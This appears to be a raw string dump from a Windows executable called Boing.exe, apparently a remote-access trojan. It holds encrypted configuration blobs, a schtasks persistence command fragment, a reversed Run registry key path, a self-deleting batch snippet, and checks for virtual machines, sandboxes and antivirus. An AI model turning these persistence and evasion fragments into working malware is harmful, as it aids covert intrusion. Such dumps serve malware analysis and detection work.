<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
tsvu{z
SHA256
vkOOlZu3C4NnzGt8ZUA9i38o0bWbRKaF2NzQnB6XUwzv2mQCccrb+dGrZYm+OzM/CPC3LGrav8E3Xj4liHs5ow==
nVLZp5oXWbu/mb0jz72bRIAcYBj8Qp/DFzFFpXlqtulWeNV/9PSd+XwxQhzp5yZdCAvSosav+uVq6qEYmnYMHA==
aXs4HK/2W1DQQeObLLjwIWFrVpTaFK+i31YC1AMaBtVUwz0JUHL0xL0br1yy0/fDDugCsZsxBZYANWCla6VY9g==
b4Cevid8L8Lxq307ajoTjRo5J6IPSOaVKQ8/0m1jv96MPlB3Up83uCNeJtHsCKo/AeOlIZwcrgZQrBGusM0wOA==
%AppData%
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456
ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Boing.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Boing.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0